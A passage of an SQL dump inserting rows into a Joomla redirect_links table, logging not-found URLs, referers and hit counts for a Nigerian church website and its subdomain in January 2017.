(2974, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2002/12/30/-', NULL, '', '', 1, 0, '2017-01-26 17:35:14', '0000-00-00 00:00:00', 301),
(2975, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2036/10/6/-', NULL, '', '', 1, 0, '2017-01-26 17:39:01', '0000-00-00 00:00:00', 301),
(2976, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2035/9/2/-', NULL, '', '', 1, 0, '2017-01-26 17:42:48', '0000-00-00 00:00:00', 301),
(2977, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2036/12/19/-', NULL, '', '', 1, 0, '2017-01-26 17:46:36', '0000-00-00 00:00:00', 301),
(2978, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2002/12/17/-', NULL, '', '', 1, 0, '2017-01-26 17:50:23', '0000-00-00 00:00:00', 301),
(2979, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2031/5/16/-', NULL, '', '', 1, 0, '2017-01-26 17:54:11', '0000-00-00 00:00:00', 301),
(2980, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2036/12/28/-', NULL, '', '', 1, 0, '2017-01-26 17:57:58', '0000-00-00 00:00:00', 301),
(2981, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2036/1/30/-', NULL, '', '', 1, 0, '2017-01-26 18:01:45', '0000-00-00 00:00:00', 301),
(2982, 'http://www.lifeoasisinternationalchurch.org/template-info/17-fp-headlines-lists', NULL, '', '', 1, 0, '2017-01-26 18:04:47', '0000-00-00 00:00:00', 301),
(2983, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2034/3/29/-', NULL, '', '', 1, 0, '2017-01-26 18:05:32', '0000-00-00 00:00:00', 301),
(2984, 'http://ljmti.lifeoasisinternationalchurch.org/index.php?option=com_k2&view=itemlist&task=tag&tag=media&Itemid=625', NULL, '', '', 1, 0, '2017-01-26 19:05:45', '0000-00-00 00:00:00', 301),
(2985, 'http://www.lifeoasisinternationalchurch.org/component/jcomments/feed/com_sermonspeaker/27', NULL, '', '', 2, 0, '2017-01-26 19:12:56', '0000-00-00 00:00:00', 301),
(2986, 'http://lifeoasisinternationalchurch.org/template-info/outreach', NULL, '', '', 38, 0, '2017-01-26 19:28:46', '0000-00-00 00:00:00', 301),
(2987, 'http://lifeoasisinternationalchurch.org/index.php/finance-convention-online-registration', NULL, '', '', 21, 0, '2017-01-26 20:03:18', '0000-00-00 00:00:00', 301),
(2988, 'http://ljmti.lifeoasisinternationalchurch.org/index.php?option=com_k2&view=itemlist&task=tag&tag=HTML5&Itemid=768', NULL, '', '', 1, 0, '2017-01-26 20:21:34', '0000-00-00 00:00:00', 301),
(2989, 'http://www.lifeoasisinternationalchurch.org/template-info/11-demo-articles/53-testing', NULL, '', '', 1, 0, '2017-01-26 20:59:06', '0000-00-00 00:00:00', 301),
(2990, 'http://www.lifeoasisinternationalchurch.org/?Itemid=212', NULL, '', '', 1, 0, '2017-01-26 21:54:21', '0000-00-00 00:00:00', 301),
(2991, 'http://www.lifeoasisinternationalchurch.org/?Itemid=108', NULL, '', '', 1, 0, '2017-01-26 21:54:38', '0000-00-00 00:00:00', 301),
(2992, 'http://ljmti.lifeoasisinternationalchurch.org/index.php?option=com_k2&view=itemlist&task=tag&tag=theme&Itemid=768', NULL, '', '', 1, 0, '2017-01-26 22:53:04', '0000-00-00 00:00:00', 301),
(2993, 'http://ljmti.lifeoasisinternationalchurch.org/index.php?option=com_k2&view=itemlist&task=tag&tag=arrowthemes&Itemid=625', NULL, '', '', 1, 0, '2017-01-27 00:08:51', '0000-00-00 00:00:00', 301),
(2994, 'http://www.lifeoasisinternationalchurch.org/a', NULL, '', '', 1, 0, '2017-01-27 01:24:46', '0000-00-00 00:00:00', 301),
(2995, 'http://www.lifeoasisinternationalchurch.org/index.php/index.php?option=com_content&view=article&id=52:daddy&catid=18:loic&Itemid=294', NULL, '', '', 1, 0, '2017-01-27 01:43:42', '0000-00-00 00:00:00', 301),
(2996, 'http://lifeoasisinternationalchurch.org/index.php/template-info/mimmp', NULL, '', '', 14, 0, '2017-01-27 01:46:00', '0000-00-00 00:00:00', 301),
(2997, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2037/11/19/-', NULL, '', '', 1, 0, '2017-01-27 04:31:53', '0000-00-00 00:00:00', 301),
(2998, 'http://lifeoasisinternationalchurch.org/web/load-config.php', NULL, 'http://lifeoasisinternationalchurch.org/web/load-config.php', '', 2, 0, '2017-01-27 06:21:32', '0000-00-00 00:00:00', 301),
(2999, 'http://ljmti.lifeoasisinternationalchurch.org/index.php?option=com_k2&view=itemlist&task=tag&tag=Lighthouse&Itemid=770', NULL, '', '', 1, 0, '2017-01-27 06:27:46', '0000-00-00 00:00:00', 301),
(3000, 'http://ljmti.lifeoasisinternationalchurch.org/index.php?option=com_k2&view=itemlist&task=tag&tag=responsive&Itemid=768', NULL, '', '', 1, 0, '2017-01-27 07:44:17', '0000-00-00 00:00:00', 301),
(3001, 'http://lifeoasisinternationalchurch.org/testimonies/week.listevents/2012/08/01/15', NULL, '', '', 3, 0, '2017-01-27 08:33:06', '0000-00-00 00:00:00', 301),
(3002, 'http://www.lifeoasisinternationalchurch.org/component/content/article/7-kindom-builder/10-prayer-a-fasting-day-1', NULL, '', '', 2, 0, '2017-01-27 08:53:33', '0000-00-00 00:00:00', 301),
(3003, 'http://www.lifeoasisinternationalchurch.org/forum/viewtopic.php?p=52', NULL, 'http://www.google.com.ng/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0CEwQFjAD&url=http%3A%2F%2Fwww.lifeoasisinternationalchurch.org%2Fforum%2Fviewtopic.php%3Fp%3D52&ei=1w-LWJbPCtbbiAWYqwE&usg=AFQjCNERV7ec6eQiKlOTK1Mz05eSOrYqNg', '', 4, 0, '2017-01-27 09:16:04', '0000-00-00 00:00:00', 301),
(3004, 'http://ljmti.lifeoasisinternationalchurch.org/index.php?option=com_k2&view=itemlist&task=tag&tag=Joomla&Itemid=770', NULL, '', '', 1, 0, '2017-01-27 10:16:09', '0000-00-00 00:00:00', 301),
(3005, 'http://www.lifeoasisinternationalchurch.org/component/content/category/11-demo-articles', NULL, 'http://www.lifeoasisinternationalchurch.org', '', 6, 0, '2017-01-27 10:34:00', '0000-00-00 00:00:00', 301),
(3006, 'http://www.lifeoasisinternationalchurch.org/ministries/gin/18-loic/50-young-achievers', NULL, '', '', 3, 0, '2017-01-27 10:59:03', '0000-00-00 00:00:00', 301),
(3007, 'http://ljmti.lifeoasisinternationalchurch.org/index.php?option=com_k2&view=itemlist&task=tag&tag=envato&Itemid=625', NULL, '', '', 1, 0, '2017-01-27 12:47:08', '0000-00-00 00:00:00', 301),
(3008, 'http://www.lifeoasisinternationalchurch.org/ministries/media-outreach/18-loic/50-young-achievers', NULL, '', '', 3, 0, '2017-01-27 14:03:22', '0000-00-00 00:00:00', 301),
(3009, 'http://ljmti.lifeoasisinternationalchurch.org/joomla/', NULL, '', '', 2, 0, '2017-01-27 14:51:44', '0000-00-00 00:00:00', 301),
(3010, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2033/4/3/-', NULL, '', '', 1, 0, '2017-01-27 15:07:50', '0000-00-00 00:00:00', 301),
(3011, 'http://ljmti.lifeoasisinternationalchurch.org/index.php?option=com_k2&view=itemlist&task=tag&tag=Lighthouse&Itemid=768', NULL, '', '', 1, 0, '2017-01-27 15:18:17', '0000-00-00 00:00:00', 301),
(3012, 'http://lifeoasisinternationalchurch.org/template-info/ljmti', NULL, '', '', 30, 0, '2017-01-27 16:54:29', '0000-00-00 00:00:00', 301),
(3013, 'http://lifeoasisinternationalchurch.org/2-video', NULL, '', '', 4, 0, '2017-01-27 18:39:35', '0000-00-00 00:00:00', 301),
(3014, 'http://www.lifeoasisinternationalchurch.org/template-info/2-uncategorised/60-destinytv', NULL, '', '', 1, 0, '2017-01-27 18:55:42', '0000-00-00 00:00:00', 301),
(3015, 'http://ljmti.lifeoasisinternationalchurch.org/index.php?option=com_k2&view=itemlist&task=tag&tag=WordPress&Itemid=770', NULL, '', '', 1, 0, '2017-01-27 20:21:29', '0000-00-00 00:00:00', 301),
(3016, 'http://www.lifeoasisinternationalchurch.org/index.php/mp3-messages/sermon/6-dark-side-of-the-anointing-4', NULL, '', '', 8, 0, '2017-01-27 20:46:24', '0000-00-00 00:00:00', 301),
(3017, 'http://lifeoasisinternationalchurch.org/prayer/131-2014-2', NULL, '', '', 1, 0, '2017-01-27 21:37:09', '0000-00-00 00:00:00', 301),
(3018, 'http://www.lifeoasisinternationalchurch.org/about-us/rev-mrs-oyenike-areogun', NULL, '', '', 1, 0, '2017-01-27 22:34:10', '0000-00-00 00:00:00', 301),
(3019, 'http://ljmti.lifeoasisinternationalchurch.org/index.php?option=com_k2&view=itemlist&task=tag&tag=CSS3&Itemid=770', NULL, '', '', 1, 0, '2017-01-27 22:53:02', '0000-00-00 00:00:00', 301),
(3020, 'http://ljmti.lifeoasisinternationalchurch.org/component/k2/itemlist/category/', NULL, '', '', 1, 0, '2017-01-28 01:08:04', '0000-00-00 00:00:00', 301),
(3021, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2034/3/25/-', NULL, '', '', 1, 0, '2017-01-28 01:23:45', '0000-00-00 00:00:00', 301),
(3022, 'http://lifeoasisinternationalchurch.org/template-info/wimmp/18-loic/50-young-achievers', NULL, '', '', 3, 0, '2017-01-28 01:38:46', '0000-00-00 00:00:00', 301),
(3023, 'http://ljmti.lifeoasisinternationalchurch.org/index.php?option=com_k2&view=itemlist&task=tag&tag=church&Itemid=770', NULL, '', '', 1, 0, '2017-01-28 01:39:29', '0000-00-00 00:00:00', 301),
(3024, 'http://ljmti.lifeoasisinternationalchurch.org/index.php?option=com_k2&view=itemlist&task=tag&tag=church&Itemid=768', NULL, '', '', 1, 0, '2017-01-28 01:41:24', '0000-00-00 00:00:00', 301),
(3025, 'http://ljmti.lifeoasisinternationalchurch.org/index.php?option=com_k2&view=itemlist&task=tag&tag=Joomla&Itemid=625', NULL, '', '', 1, 0, '2017-01-28 01:42:03', '0000-00-00 00:00:00', 301),
(3026, 'http://www.lifeoasisinternationalchurch.org/testimonies/month.calendar/2012/11/04/-', NULL, '', '', 1, 0, '2017-01-28 02:16:15', '0000-00-00 00:00:00', 301),
(3027, 'http://www.lifeoasisinternationalchurch.org/ministries/outreach/18-loic/50-young-achievers', NULL, '', '', 4, 0, '2017-01-28 02:46:48', '0000-00-00 00:00:00', 301),
(3028, 'http://lifeoasisinternationalchurch.org/web/lndex.php', NULL, 'http://lifeoasisinternationalchurch.org/web/lndex.php', '', 2, 0, '2017-01-28 03:09:31', '0000-00-00 00:00:00', 301),
(3029, 'http://lifeoasisinternationalchurch.org/template-info/mimmp', NULL, '', '', 30, 0, '2017-01-28 03:25:55', '0000-00-00 00:00:00', 301),
(3030, 'http://www.lifeoasisinternationalchurch.org/index.php/mp3-messages/sermon/15-entering-into-winning-position-3', NULL, '', '', 4, 0, '2017-01-28 04:25:34', '0000-00-00 00:00:00', 301),
(3031, 'http://www.lifeoasisinternationalchurch.org/about-us/our-belief/18-loic/50-young-achievers', NULL, '', '', 3, 0, '2017-01-28 04:32:46', '0000-00-00 00:00:00', 301),
(3032, 'http://ljmti.lifeoasisinternationalchurch.org/index.php?option=com_k2&view=itemlist&task=tag&tag=Joomla&Itemid=768', NULL, '', '', 1, 0, '2017-01-28 05:29:42', '0000-00-00 00:00:00', 301);
INSERT INTO `y57u5_redirect_links` (`id`, `old_url`, `new_url`, `referer`, `comment`, `hits`, `published`, `created_date`, `modified_date`, `header`) VALUES
(3033, 'http://lifeoasisinternationalchurch.org/template-info/music/18-loic/50-young-achievers', NULL, '', '', 1, 0, '2017-01-28 06:19:38', '0000-00-00 00:00:00', 301),
(3034, 'http://www.lifeoasisinternationalchurch.org/index.php/12-sample-content/15-sample-content-4', NULL, '', '', 4, 0, '2017-01-28 06:25:22', '0000-00-00 00:00:00', 301),
(3035, 'http://ljmti.lifeoasisinternationalchurch.org/index.php?option=com_k2&view=itemlist&task=tag&tag=music&Itemid=770', NULL, '', '', 1, 0, '2017-01-28 06:46:03', '0000-00-00 00:00:00', 301),
(3036, 'http://www.lifeoasisinternationalchurch.org/index.php/244-day-6-of-21-days-fasting-and-prayer-october', NULL, '', '', 7, 0, '2017-01-28 06:59:07', '0000-00-00 00:00:00', 301),
(3037, 'http://lifeoasisinternationalchurch.org/readme.html', NULL, 'http://lifeoasisinternationalchurch.org/readme.html', '', 5, 0, '2017-01-28 07:03:12', '0000-00-00 00:00:00', 301),
(3038, 'http://www.lifeoasisinternationalchurch.org/index.php/163-day-35', NULL, '', '', 7, 0, '2017-01-28 08:26:08', '0000-00-00 00:00:00', 301),
(3039, 'http://lifeoasisinternationalchurch.org/index.php/2012-11-09-09-57-10/seminar', NULL, '', '', 5, 0, '2017-01-28 08:26:32', '0000-00-00 00:00:00', 301),
(3040, 'http://lifeoasisinternationalchurch.org/mp3-messages/speaker/3-rev-mrs-oyenike-areogun', NULL, '', '', 1, 0, '2017-01-28 09:10:35', '0000-00-00 00:00:00', 301),
(3041, 'http://lifeoasisinternationalchurch.org/18-loic/35-trm', NULL, '', '', 7, 0, '2017-01-28 09:11:30', '0000-00-00 00:00:00', 301),
(3042, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2031/5/2/-', NULL, '', '', 1, 0, '2017-01-28 10:21:45', '0000-00-00 00:00:00', 301),
(3043, 'http://ljmti.lifeoasisinternationalchurch.org/index.php?option=com_k2&view=itemlist&task=tag&tag=media&Itemid=768', NULL, '', '', 1, 0, '2017-01-28 10:32:57', '0000-00-00 00:00:00', 301),
(3044, 'http://lifeoasisinternationalchurch.org/mp3-messages/sermon/6-dark-side-of-the-anointing-4', NULL, '', '', 17, 0, '2017-01-28 11:05:06', '0000-00-00 00:00:00', 301),
(3045, 'http://www.lifeoasisinternationalchurch.org/index.php/template-info-2/our-belief', NULL, '', '', 14, 0, '2017-01-28 11:44:57', '0000-00-00 00:00:00', 301),
(3046, 'http://ljmti.lifeoasisinternationalchurch.org/index.php?option=com_k2&view=itemlist&task=tag&tag=theme&Itemid=625', NULL, '', '', 1, 0, '2017-01-28 11:48:49', '0000-00-00 00:00:00', 301),
(3047, 'http://www.lifeoasisinternationalchurch.org/index.php/156-day-29', NULL, '', '', 4, 0, '2017-01-28 11:50:43', '0000-00-00 00:00:00', 301),
(3048, 'http://ljmti.lifeoasisinternationalchurch.org/index.php?option=com_k2&view=itemlist&task=tag&tag=envato&Itemid=768', NULL, '', '', 1, 0, '2017-01-28 11:58:57', '0000-00-00 00:00:00', 301),
(3049, 'http://ljmti.lifeoasisinternationalchurch.org/index.php?option=com_k2&view=itemlist&task=tag&tag=arrowthemes&Itemid=768', NULL, '', '', 1, 0, '2017-01-28 12:01:03', '0000-00-00 00:00:00', 301),
(3050, 'http://lifeoasisinternationalchurch.org/index.php/template-info/outreach', NULL, '', '', 6, 0, '2017-01-28 12:24:26', '0000-00-00 00:00:00', 301),
(3051, 'http://www.lifeoasisinternationalchurch.org/livestream', NULL, '', '', 11, 0, '2017-01-28 12:40:13', '0000-00-00 00:00:00', 301),
(3052, 'http://www.lifeoasisinternationalchurch.org/49-prophetic-words-for-day-39', NULL, '', '', 1, 0, '2017-01-28 14:21:27', '0000-00-00 00:00:00', 301),
(3053, 'http://www.lifeoasisinternationalchurch.org/50-prayer-a-fasting-day-40', NULL, '', '', 1, 0, '2017-01-28 14:21:28', '0000-00-00 00:00:00', 301),
(3054, 'http://www.lifeoasisinternationalchurch.org/11-demo-articles/2-module-positions', NULL, '', '', 2, 0, '2017-01-28 14:21:29', '0000-00-00 00:00:00', 301),
(3055, 'http://www.lifeoasisinternationalchurch.org/7-kindom-builder/19-prayer-a-fasting-day-10', NULL, '', '', 2, 0, '2017-01-28 14:21:46', '0000-00-00 00:00:00', 301),
(3056, 'http://www.lifeoasisinternationalchurch.org/7-kindom-builder/35-prayer-a-fasting-day-26', NULL, '', '', 4, 0, '2017-01-28 14:21:47', '0000-00-00 00:00:00', 301),
(3057, 'http://www.lifeoasisinternationalchurch.org/11-demo-articles/6-integrated-extensions', NULL, '', '', 3, 0, '2017-01-28 14:23:02', '0000-00-00 00:00:00', 301),
(3058, 'http://www.lifeoasisinternationalchurch.org/12-sample-content/15-sample-content-4', NULL, '', '', 4, 0, '2017-01-28 14:26:34', '0000-00-00 00:00:00', 301),
(3059, 'http://www.lifeoasisinternationalchurch.org/7-kindom-builder/17-prayer-a-fasting-day-8', NULL, '', '', 6, 0, '2017-01-28 14:26:39', '0000-00-00 00:00:00', 301),
(3060, 'http://www.lifeoasisinternationalchurch.org/7-kindom-builder/18-prayer-a-fasting-day', NULL, '', '', 2, 0, '2017-01-28 14:26:40', '0000-00-00 00:00:00', 301),
(3061, 'http://www.lifeoasisinternationalchurch.org/7-kindom-builder/12-prayer-a-fasting-day-3', NULL, '', '', 3, 0, '2017-01-28 14:26:42', '0000-00-00 00:00:00', 301),
(3062, 'http://www.lifeoasisinternationalchurch.org/33-prayer-a-fasting-day-24', NULL, '', '', 1, 0, '2017-01-28 14:26:42', '0000-00-00 00:00:00', 301),
(3063, 'http://www.lifeoasisinternationalchurch.org/11-demo-articles/7-tutorials-and-guides', NULL, '', '', 3, 0, '2017-01-28 14:40:57', '0000-00-00 00:00:00', 301),
(3064, 'http://ljmti.lifeoasisinternationalchurch.org/index.php?option=com_k2&view=itemlist&task=tag&tag=AudioJungle&Itemid=770', NULL, '', '', 1, 0, '2017-01-28 14:45:58', '0000-00-00 00:00:00', 301),
(3065, 'http://www.lifeoasisinternationalchurch.org/7-kindom-builder/16-prayer-a-fasting-day-7', NULL, '', '', 3, 0, '2017-01-28 14:51:41', '0000-00-00 00:00:00', 301),
(3066, 'http://www.lifeoasisinternationalchurch.org/34-prayer-a-fasting-day-25', NULL, '', '', 1, 0, '2017-01-28 14:51:43', '0000-00-00 00:00:00', 301),
(3067, 'http://www.lifeoasisinternationalchurch.org/20-prayer-a-fasting-day-11', NULL, '', '', 1, 0, '2017-01-28 14:51:44', '0000-00-00 00:00:00', 301),
(3068, 'http://www.lifeoasisinternationalchurch.org/2-video', NULL, '', '', 1, 0, '2017-01-28 14:51:44', '0000-00-00 00:00:00', 301),
(3069, 'http://www.lifeoasisinternationalchurch.org/18-prayer-a-fasting-day', NULL, '', '', 1, 0, '2017-01-28 15:16:10', '0000-00-00 00:00:00', 301),
(3070, 'http://www.lifeoasisinternationalchurch.org/17-prayer-a-fasting-day-8', NULL, '', '', 1, 0, '2017-01-28 15:22:08', '0000-00-00 00:00:00', 301),
(3071, 'http://www.lifeoasisinternationalchurch.org/7-kindom-builder/15-prayer-a-fasting-day-6', NULL, '', '', 4, 0, '2017-01-28 15:34:22', '0000-00-00 00:00:00', 301),
(3072, 'http://www.lifeoasisinternationalchurch.org/35-prayer-a-fasting-day-26', NULL, '', '', 1, 0, '2017-01-28 15:34:23', '0000-00-00 00:00:00', 301),
(3073, 'http://www.lifeoasisinternationalchurch.org/2-uncategorised/60-destinytv', NULL, '', '', 5, 0, '2017-01-28 15:34:26', '0000-00-00 00:00:00', 301),
(3074, 'http://www.lifeoasisinternationalchurch.org/19-prayer-a-fasting-day-10', NULL, '', '', 1, 0, '2017-01-28 15:46:47', '0000-00-00 00:00:00', 301),
(3075, 'http://www.lifeoasisinternationalchurch.org/index.php/266-day-6-of-21-days-fasting-and-prayer-november', NULL, '', '', 7, 0, '2017-01-28 17:17:57', '0000-00-00 00:00:00', 301),
(3076, 'http://ljmti.lifeoasisinternationalchurch.org/index.php?option=com_k2&view=itemlist&task=tag&tag=Lighthouse&Itemid=625', NULL, '', '', 1, 0, '2017-01-28 19:49:06', '0000-00-00 00:00:00', 301),
(3077, 'http://ljmti.lifeoasisinternationalchurch.org/index.php?option=com_k2&view=itemlist&task=tag&tag=envato&Itemid=770', NULL, '', '', 1, 0, '2017-01-28 21:04:53', '0000-00-00 00:00:00', 301),
(3078, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2035/2/17/-', NULL, '', '', 1, 0, '2017-01-28 21:22:53', '0000-00-00 00:00:00', 301),
(3079, 'http://lifeoasisinternationalchurch.org/resources/salvation/18-loic/50-young-achievers', NULL, '', '', 4, 0, '2017-01-28 21:58:06', '0000-00-00 00:00:00', 301),
(3080, 'http://lifeoasisinternationalchurch.org/resources/baptism/18-loic/50-young-achievers', NULL, '', '', 2, 0, '2017-01-28 22:18:39', '0000-00-00 00:00:00', 301),
(3081, 'http://lifeoasisinternationalchurch.org/template-info-2/our-service-schedule/18-loic/50-young-achievers', NULL, '', '', 4, 0, '2017-01-28 22:55:49', '0000-00-00 00:00:00', 301),
(3082, 'http://ljmti.lifeoasisinternationalchurch.org/index.php?option=com_k2&view=itemlist&task=tag&tag=AudioJungle&Itemid=768', NULL, '', '', 1, 0, '2017-01-28 23:36:26', '0000-00-00 00:00:00', 301),
(3083, 'http://www.lifeoasisinternationalchurch.org/index.php/220-2016-day-3', NULL, '', '', 7, 0, '2017-01-29 00:48:14', '0000-00-00 00:00:00', 301),
(3084, 'http://ljmti.lifeoasisinternationalchurch.org/index.php?option=com_k2&view=itemlist&task=tag&tag=media&Itemid=770', NULL, '', '', 1, 0, '2017-01-29 02:08:00', '0000-00-00 00:00:00', 301),
(3085, 'http://www.lifeoasisinternationalchurch.org/prayer/164-prayerfocus23', NULL, '', '', 1, 0, '2017-01-29 02:46:26', '0000-00-00 00:00:00', 301),
(3086, 'http://www.lifeoasisinternationalchurch.org/index.php/mp3-messages/speaker/3-rev-mrs-oyenike-areogun/series', NULL, '', '', 4, 0, '2017-01-29 03:27:51', '0000-00-00 00:00:00', 301),
(3087, 'http://ljmti.lifeoasisinternationalchurch.org/index.php?option=com_k2&view=itemlist&task=tag&tag=music&Itemid=768', NULL, '', '', 1, 0, '2017-01-29 04:39:35', '0000-00-00 00:00:00', 301),
(3088, 'http://lifeoasisinternationalchurch.org/prayer/prayer/7-kindom-builder/33-prayer-a-fasting-day-24', NULL, '', '', 2, 0, '2017-01-29 05:17:50', '0000-00-00 00:00:00', 301),
(3089, 'http://lifeoasisinternationalchurch.org/template-info-2/our-belief/18-loic/50-young-achievers?page&print=1&tmpl=component', NULL, '', '', 2, 0, '2017-01-29 05:19:20', '0000-00-00 00:00:00', 301),
(3090, 'http://lifeoasisinternationalchurch.org/partnership/18-loic/50-young-achievers', NULL, '', '', 2, 0, '2017-01-29 05:22:08', '0000-00-00 00:00:00', 301),
(3091, 'http://ljmti.lifeoasisinternationalchurch.org/index.php?option=com_k2&view=itemlist&task=tag&tag=HTML5&Itemid=625', NULL, '', '', 1, 0, '2017-01-29 05:56:13', '0000-00-00 00:00:00', 301),
(3092, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2035/2/22/-', NULL, '', '', 1, 0, '2017-01-29 06:13:03', '0000-00-00 00:00:00', 301),
(3093, 'http://www.lifeoasisinternationalchurch.org/event/', NULL, '', '', 1, 0, '2017-01-29 06:56:08', '0000-00-00 00:00:00', 301),
(3094, 'http://www.lifeoasisinternationalchurch.org/component/jcomments/captcha/30647', NULL, '', '', 3, 0, '2017-01-29 08:20:19', '0000-00-00 00:00:00', 301),
(3095, 'http://ljmti.lifeoasisinternationalchurch.org/index.php?option=com_k2&view=itemlist&task=tag&tag=church&Itemid=625', NULL, '', '', 1, 0, '2017-01-29 08:26:57', '0000-00-00 00:00:00', 301),
(3096, 'http://www.lifeoasisinternationalchurch.org/component/jcomments/captcha/56178', NULL, '', '', 1, 0, '2017-01-29 10:12:13', '0000-00-00 00:00:00', 301),
(3097, 'http://www.lifeoasisinternationalchurch.org/component/jcomments/captcha/35324', NULL, '', '', 1, 0, '2017-01-29 10:15:43', '0000-00-00 00:00:00', 301),
(3098, 'http://lifeoasisinternationalchurch.org/component/jcomments/captcha/82392', NULL, '', '', 1, 0, '2017-01-29 10:21:17', '0000-00-00 00:00:00', 301),
(3099, 'http://www.lifeoasisinternationalchurch.org/index.php/component/jcomments/feed/com_sermonspeaker/30', NULL, '', '', 3, 0, '2017-01-29 10:27:49', '0000-00-00 00:00:00', 301),
(3100, 'http://www.lifeoasisinternationalchurch.org/component/jcomments/captcha/26437', NULL, '', '', 1, 0, '2017-01-29 10:31:28', '0000-00-00 00:00:00', 301),
(3101, 'http://www.lifeoasisinternationalchurch.org/component/jcomments/captcha/23109', NULL, '', '', 1, 0, '2017-01-29 10:33:05', '0000-00-00 00:00:00', 301),
(3102, 'http://www.lifeoasisinternationalchurch.org/component/jcomments/captcha/26014', NULL, '', '', 1, 0, '2017-01-29 10:44:04', '0000-00-00 00:00:00', 301),
(3103, 'http://www.lifeoasisinternationalchurch.org/164-prayerfocus23', NULL, '', '', 1, 0, '2017-01-29 10:58:43', '0000-00-00 00:00:00', 301),
(3104, 'http://www.lifeoasisinternationalchurch.org/component/jcomments/captcha/97361', NULL, '', '', 1, 0, '2017-01-29 11:18:07', '0000-00-00 00:00:00', 301),
(3105, 'http://www.lifeoasisinternationalchurch.org/component/jcomments/captcha/36198', NULL, '', '', 2, 0, '2017-01-29 11:29:44', '0000-00-00 00:00:00', 301),
(3106, 'http://www.lifeoasisinternationalchurch.org/index.php/2012-11-09-09-57-10/father-s-heart/18-loic/50-young-achievers', NULL, '', '', 2, 0, '2017-01-29 11:34:39', '0000-00-00 00:00:00', 301),
(3107, 'http://www.lifeoasisinternationalchurch.org/component/jcomments/captcha/75586', NULL, '', '', 2, 0, '2017-01-29 11:57:34', '0000-00-00 00:00:00', 301),
(3108, 'http://www.lifeoasisinternationalchurch.org/component/jcomments/captcha/71635', NULL, '', '', 1, 0, '2017-01-29 12:09:37', '0000-00-00 00:00:00', 301),
(3109, 'http://www.lifeoasisinternationalchurch.org/component/jcomments/captcha/85430', NULL, '', '', 1, 0, '2017-01-29 12:11:50', '0000-00-00 00:00:00', 301),
(3110, 'http://www.lifeoasisinternationalchurch.org/component/jcomments/captcha/14701', NULL, '', '', 1, 0, '2017-01-29 12:13:12', '0000-00-00 00:00:00', 301),
(3111, 'http://ljmti.lifeoasisinternationalchurch.org/ministries/afh', NULL, '', '', 1, 0, '2017-01-29 12:58:33', '0000-00-00 00:00:00', 301),
(3112, 'http://www.lifeoasisinternationalchurch.org/mp3-messages/serie/', NULL, '', '', 1, 0, '2017-01-29 13:04:37', '0000-00-00 00:00:00', 301),
(3113, 'http://lifeoasisinternationalchurch.org/testimonies/month.calendar/2012/11/10/-', NULL, '', '', 1, 0, '2017-01-29 13:27:02', '0000-00-00 00:00:00', 301),
(3114, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2032/5/12/-', NULL, '', '', 1, 0, '2017-01-29 13:28:48', '0000-00-00 00:00:00', 301),
(3115, 'http://ljmti.lifeoasisinternationalchurch.org/index.php?option=com_k2&view=itemlist&task=tag&tag=AudioJungle&Itemid=625', NULL, '', '', 1, 0, '2017-01-29 13:30:04', '0000-00-00 00:00:00', 301),
(3116, 'http://ljmti.lifeoasisinternationalchurch.org/event/', NULL, '', '', 1, 0, '2017-01-29 13:39:28', '0000-00-00 00:00:00', 301),
(3117, 'http://lifeoasisinternationalchurch.org/contact.php', NULL, '', '', 16, 0, '2017-01-29 13:45:39', '0000-00-00 00:00:00', 301),
(3118, 'http://www.lifeoasisinternationalchurch.org/172-prayerfocus192014', NULL, '', '', 1, 0, '2017-01-29 14:19:28', '0000-00-00 00:00:00', 301),
(3119, 'http://ljmti.lifeoasisinternationalchurch.org/index.php?option=com_k2&view=itemlist&task=tag&tag=music&Itemid=625', NULL, '', '', 1, 0, '2017-01-29 14:46:21', '0000-00-00 00:00:00', 301),
(3120, 'http://ljmti.lifeoasisinternationalchurch.org/blog/item/20-fathers-heart-29-01-2017', NULL, '', '', 1, 0, '2017-01-29 15:58:38', '0000-00-00 00:00:00', 301),
(3121, 'http://www.lifeoasisinternationalchurch.org/blog/item/20-fathers-heart-29-01-2017', NULL, '', '', 3, 0, '2017-01-29 16:28:52', '0000-00-00 00:00:00', 301),
(3122, 'http://lifeoasisinternationalchurch.org/index.php/11-kindom-builder/51-prophetic-words-for-day-39', NULL, '', '', 7, 0, '2017-01-29 17:08:43', '0000-00-00 00:00:00', 301),
(3123, 'http://lifeoasisinternationalchurch.org/blog/item/20-fathers-heart-29-01-2017', NULL, 'http://lifeoasisinternationalchurch.org/', '', 3, 0, '2017-01-29 17:15:21', '0000-00-00 00:00:00', 301),
(3124, 'http://ljmti.lifeoasisinternationalchurch.org/index.php?option=com_k2&view=itemlist&task=tag&tag=CSS3&Itemid=768', NULL, '', '', 1, 0, '2017-01-29 18:33:10', '0000-00-00 00:00:00', 301),
(3125, 'http://www.lifeoasisinternationalchurch.org/component/jcomments/captcha/25236', NULL, '', '', 1, 0, '2017-01-29 18:44:39', '0000-00-00 00:00:00', 301),
(3126, 'http://www.lifeoasisinternationalchurch.org/component/jcomments/captcha/66239', NULL, '', '', 1, 0, '2017-01-29 18:53:46', '0000-00-00 00:00:00', 301),
(3127, 'http://www.lifeoasisinternationalchurch.org/component/jcomments/captcha/95379', NULL, '', '', 2, 0, '2017-01-29 18:57:31', '0000-00-00 00:00:00', 301),
(3128, 'http://www.lifeoasisinternationalchurch.org/component/jcomments/captcha/65963', NULL, '', '', 1, 0, '2017-01-29 19:01:51', '0000-00-00 00:00:00', 301),
